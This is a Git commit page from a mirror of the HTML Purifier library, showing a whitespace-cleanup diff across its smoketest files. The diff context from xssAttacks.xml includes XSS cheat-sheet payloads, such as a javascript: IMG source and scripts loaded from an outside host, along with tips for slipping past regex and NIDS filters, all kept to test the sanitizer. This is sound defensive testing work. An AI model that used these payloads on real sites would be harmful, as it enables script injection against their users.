mirror/php-htmlpurifier
1
0
Fork 0
mirror of https://github.com/ezyang/htmlpurifier.git synced 2025-07-31 19:30:21 +02:00
Code Issues Releases Wiki Activity

Remove trailing whitespace.

Browse Source 
Signed-off-by: Edward Z. Yang <edwardzyang@thewritingpot.com>
This commit is contained in:
Edward Z. Yang
2008-12-06 02:28:20 -05:00
parent 3a6b63dff1
commit 2c955af135
476 changed files with 5595 additions and 5547 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
smoketests/all.php
View File

@@ -5,7 +5,7 @@ require_once 'common.php';
header('Content-type: text/html; charset=UTF-8');
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

2
smoketests/attrTransform.php
View File

@@ -2,7 +2,7 @@
require 'common.php';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

4
smoketests/attrTransform.xml
View File

@@ -177,8 +177,8 @@
<sample><![CDATA[<ol type="1"><li>1</li><li>2</li></ul>]]></sample>
<sample><![CDATA[<ol><li type="a">1</li><li type="I">2</li></ul>]]></sample>
</group>
<!-- sample
<group title="">
<sample><![CDATA[]]></sample>

4
smoketests/basic.php
View File

@@ -17,11 +17,11 @@ $strict = isset($_GET['d']) ? (bool) $_GET['d'] : false;
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?>
<?php if ($strict) { ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1- Strict.dtd">
<?php } else { ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<?php } ?>

2
smoketests/basic/allElements.html
View File

@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

2
smoketests/basic/legacy.html
View File

@@ -1,5 +1,5 @@
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

2
smoketests/common.php
View File

@@ -25,7 +25,7 @@ if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
}
}
}
fix_magic_quotes($_GET);
fix_magic_quotes($_POST);
fix_magic_quotes($_COOKIE);

12
smoketests/configForm.php
View File

@@ -8,14 +8,14 @@ $interchange = HTMLPurifier_ConfigSchema_InterchangeBuilder::buildFromDirectory(
$interchange->validate();
if (isset($_GET['doc'])) {
// Hijack page generation to supply documentation
if (file_exists('test-schema.html') && !isset($_GET['purge'])) {
echo file_get_contents('test-schema.html');
exit;
}
$style = 'plain';
$configdoc_xml = 'test-schema.xml';
@@ -30,15 +30,15 @@ if (isset($_GET['doc'])) {
'css' => '../configdoc/styles/plain.css',
));
$html = $xslt->transformToHTML($configdoc_xml);
unlink('test-schema.xml');
file_put_contents('test-schema.html', $html);
echo $html;
exit;
}
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

2
smoketests/extractStyleBlocks.php
View File

@@ -27,7 +27,7 @@ $purifier = new HTMLPurifier(array(
$html = isset($_POST['html']) ? $_POST['html'] : '';
$purified_html = $purifier->purify($html);
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

2
smoketests/preserveYouTube.php
View File

@@ -3,7 +3,7 @@
require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

2
smoketests/variableWidthAttack.php
View File

@@ -3,7 +3,7 @@
require_once 'common.php';
echo '<?xml version="1.0" encoding="UTF-8" ?>';
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

10
smoketests/xssAttacks.php
View File

@@ -3,7 +3,7 @@
require_once('common.php');
function formatCode($string) {
return
return
str_replace(
array("\t", '»', '\0(null)'),
array('<strong>\t</strong>', '<span class="linebreak">»</span>', '<strong>\0</strong>'),
@@ -15,7 +15,7 @@ function formatCode($string) {
);
}
?><!DOCTYPE html
?><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
@@ -64,18 +64,18 @@ $purifier = new HTMLPurifier($config);
$i = 0;
foreach ($xml->attack as $attack) {
$code = $attack->code;
// custom code for null byte injection tests
if (substr($code, 0, 7) == 'perl -e') {
$code = substr($code, $i=strpos($code, '"')+1, strrpos($code, '"') - $i);
$code = str_replace('\0', "\0", $code);
}
// disable vectors we cannot test in any meaningful way
if ($code == 'See Below') continue; // event handlers, whitelist defeats
if ($attack->name == 'OBJECT w/Flash 2') continue; // requires ActionScript
if ($attack->name == 'IMG Embedded commands 2') continue; // is an HTTP response
// custom code for US-ASCII, which couldn't be expressed in XML without encoding
if ($attack->name == 'US-ASCII encoding') $code = urldecode($code);
?>

14
smoketests/xssAttacks.xml
View File

@@ -133,7 +133,7 @@
<desc>INPUT Image</desc>
<label>HTML Element Attacks</label>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
</attack>
<attack>
@@ -845,7 +845,7 @@ echo(&apos;IPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&apos;); ?&gt;</code>
<name>Half-Open HTML/JavaScript</name>
<code>&lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;</code>
<desc>Unlike Firefox, the IE rendering engine doesn&apos;t add extra data to your page, but it does allow the &quot;javascript:&quot; directive in images. This is useful as a vector because it doesn&apos;t require a close angle bracket. This assumes that there is at least one HTML tag below where you are injecting this cross site scripting vector. Even though there is no close &gt; tag the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. See http://www.blackhat.com/presentations/bh-usa-04/bh-us-04-mookhey/bh-us-04-mookhey-up.ppt for more info. It gets around the following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
/((\%3D)|(=))[^\n]*((\%3C)|&lt;)[^\n]+((\%3E)|>)/
As a side note, this was also effective against a real world XSS filter I came across using an open ended &lt;IFRAME tag instead of an &lt;IMG tag.</desc>
<label>Embedded Character Attacks</label>
@@ -893,7 +893,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<name>Event Handlers List 1</name>
<code>See Below</code>
<desc>Event Handlers that can be used in XSS attacks (this is the most comprehensive list on the net, at the time of this writing). Each one may have different results in different browsers. Thanks to Rene Ledosquet (http://www.secaron.de/) for the HTML+TIME updates:
-FSCommand() (execute from within an embedded Flash object)
-onAbort() (when user aborts the loading of an image)
@@ -973,7 +973,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<code>See Below</code>
<desc>-onEnd() (fires when the timeline ends. This can be exploited, like most of the HTML+TIME event handlers by doing something like &lt;P STYLE=&quot;behavior:url(&apos;#default#time2&apos;)&quot; onEnd=&quot;alert(&apos;XSS&apos;)&quot;&gt;)
-onError() (loading of a document or image causes an error)
-onErrorUpdate() (fires on a databound object when an error occurs while updating the associated data in the data source object)
@@ -1048,7 +1048,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<name>Event Handlers List 3</name>
<code>See Below</code>
<desc>-onRepeat() (fires once for each repetition of the timeline, excluding the first full cycle)
-onReset() (fires when user or attacker resets a form)
-onResize() (user would resize the window; attacker could auto initialize with something like: &lt;SCRIPT&gt;self.resizeTo(500,400);&lt;/SCRIPT&gt;)
@@ -1116,7 +1116,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<code>&lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>For performing XSS on sites that allow &quot;&lt;SCRIPT>&quot; but don&apos;t allow &quot;&lt;SCRIPT SRC...&quot; by way of a regex filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
(this is an important one, because I&apos;ve seen this regex in the wild)</desc>
<label>XSS w/HTML Quote Encapsulation</label>
@@ -1137,7 +1137,7 @@ alert(a.source)&lt;/SCRIPT&gt;</code>
<name>Evade Regex Filter 4</name>
<code>&lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
<desc>Yet another XSS to evade the same filter:
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i
The only thing I&apos;ve seen work against this XSS attack if you still want to allow &lt;SCRIPT&gt; tags but not remote scripts is a state machine (and of course there are other ways to get around this if they allow &lt;SCRIPT&gt; tags)</desc>
<label>XSS w/HTML Quote Encapsulation</label>